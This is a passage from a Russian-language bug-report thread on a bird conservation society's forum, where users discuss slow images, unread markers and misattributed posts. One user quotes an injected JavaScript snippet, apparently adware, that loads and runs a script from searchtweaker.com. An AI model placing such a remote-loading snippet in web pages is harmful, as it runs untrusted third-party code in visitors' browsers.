Поиск по сайту
Авторизация
Логин:
Пароль:
Регистрация
Забыли свой пароль?

vstupi.jpg

vznosy1.jpg

Pomogi.jpg

Chizh-PG.jpg

Veterinar.jpg

BG.jpg
baner_Sturman.gif


 



БАГИ нового форума

Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: Пред. 1 ... 23 24 25 26 27 ... 38 След.
RSS
БАГИ нового форума
 
У меня она временами появляется уже недели две-три. К счастью, обычно помогает refresh.
Иркутск
 
Ага, значит я не один, думал, это ондроед виноват,  после перезагрузки все ОК
 
Как-то не очень работает кнопка "Обновления". Все время ей пользуюсь, а тут обратил внимание, что после того, как прочел "обновления", еще полно непрочитанных сообщений.
Ужас! :D

У меня есть подозрения: я читаю форум с разных машин, с перс. компьютера, с планшета. Боюсь, что это от этого. Но может есть какое нибудь решение?
Изменено: Алексей (Fronton) - 22 июня 2013 15:14:59
Москва, Север. За кольцевой дорогой.
 
У меня, после изменений на сайте, практически каждую фотографию невозможно открыть  :?:  :!:
Львів
 
Цитата
АК-75 пишет:
У меня, после изменений на сайте, практически каждую фотографию невозможно открыть
У меня то же самое. В любых браузерах, на любых компьютерах. Фото открываются, но через минуту-другую. Приходится нажать и ждать.
Изменено: Artem - 11 февраля 2014 21:33:54
Нет войне! россия - страна-террорист.
 
У меня на домашнем после этого обновления ни фото совершенно не открываются из превью, ни комментарии написать нельзя - просто "некуда", активная зона с курсором отсутствует. Впрочем, там и компьютер. и система , и браузер совсем уж старенькие.
Иркутск
 
Цитата
Artem пишет:
В любых браузерах, на любых компьютерах. Фото открываются, но через минуту-другую.
Нашел для себя решение проблемы. Если переключится между вкладками в браузере, то через просмотрщик сайта картинка открывается сразу, или же правой мышкой на просмотрщик-> открыть изображение и смотрим картинку в полном разрешении (тоже открывается моментально). Чистка кэша не помогла, компьютер тянет battlefield 4   :)  (в смысле, не старый)
Нет войне! россия - страна-террорист.
 
Цитата
Алексей (Fronton) пишет:
Как-то не очень работает кнопка "Обновления". Все время ей пользуюсь, а тут обратил внимание, что после того, как прочел "обновления", еще полно непрочитанных сообщений.
Ужас!

У меня есть подозрения: я читаю форум с разных машин, с перс. компьютера, с планшета. Боюсь, что это от этого. Но может есть какое нибудь решение?
У меня то же самое примерно... Во вкладке "Обновления" они вроде все открываются, но на главной странице форума красным помечается не все новое. Причем определенные только темы...
Изменено: shahin - 11 февраля 2014 21:48:52
Андрей Коваленко
Казахстан, Алматы.
 
То есть приходится подчищать, раз в неделю  :D  
Но это малая плата, которую мы платим за качество содержания!
Жаловаться грех, так, поворчать :D
Изменено: Алексей (Fronton) - 12 февраля 2014 20:22:49
Москва, Север. За кольцевой дорогой.
 
Опять отметка "new" куда-то пропала, теперь вообще везде  :(
 
Хм, а на планшете все нормально, и картинки быстрее открываются... И на андроиде, и на ПК пользуюсь Оперой, в чём же причина?
 
Ура, заработало!!  :D
 
Все таки еще раз. Я уже год назад писал:

Цитата
Дмитрий Штоль пишет:
Только сейчас заметил, что у меня дата регистрации стоит 13.10.2012, хотя я участвую в форуме гораздо раньше. При этом не находятся мои сообщения, которые раньше были. Оказывается, мои более ранние сообщения числятся за "гостем" (пример http://rbcu.ru/forum/forum14/topic2253/index.php?TOPIC_SUBSCRIBE=Y&sessid=7496f87921744beb45ce0d39d0da86ca ) . Просьба вернуть мне мои сообщения.

Так и нельзя вернуть мне мои сообщения? А то и искать их сложнее...
"Там, где асфальт, ничего интересного, а где интересно, там нет асфальта". ©
 
Цитата
Дмитрий Штоль пишет:
Все таки еще раз. Я уже год назад писал:
Цитата
Дмитрий Штоль пишет:
Только сейчас заметил, что у меня дата регистрации стоит 13.10.2012, хотя я участвую в форуме гораздо раньше. При этом не находятся мои сообщения, которые раньше были. Оказывается, мои более ранние сообщения числятся за "гостем" (пример http://rbcu.ru/forum/forum14/topic2253/index.php?TOPIC_SUBSCRIBE=Y&sessid=7496f87921744beb45ce0d39d0da86ca ) . Просьба вернуть мне мои сообщения.

Так и нельзя вернуть мне мои сообщения? А то и искать их сложнее...
Легче вклады в Сбербанке СССР вернуть...;)
Андрей Коваленко
Казахстан, Алматы.
 
Что-то при каждом ответе в пост снизу вставляется сам по себе какой-то скрипт. Вот такой:
(function(){try{var header=document.getElementsByTagName("HEAD"[IMG][0];var script=document.createElement("SCRIPT"[IMG];script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded"[IMG]){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.on load=script.on readystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.on load=null;script.on readystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Андрей Коваленко
Казахстан, Алматы.
 
Заметно. Андрей, а с чего пишете? Или, с какого бы устройства и с какого браузера не писал, все равно едино?
Изменено: igor_f - 11 августа 2014 08:33:27
Иркутск
 
Пишу с ноутбука в Мозилле.
Андрей Коваленко
Казахстан, Алматы.
 
Вот, кстати, в этой теме только что написал и без глюка... Значит, дело в сайте.
Изменено: shahin - 11 августа 2014 08:56:08
Андрей Коваленко
Казахстан, Алматы.
 
Смотреть причину здесь - http://learn.javascript.ru/onload-onerror
 
Цитата
shahin пишет:
Вот, кстати, в этой теме только что написал и без глюка... Значит, дело в сайте.
Или в компьютере, у которого скрипты иногда некорректно отрабатывают.
Изменено: igor_f - 11 августа 2014 08:58:42
Иркутск
Страницы: Пред. 1 ... 23 24 25 26 27 ... 38 След.
Читают тему (гостей: 1)



© 2003-2024 Союз охраны птиц России
Создание сайта - Infoday Media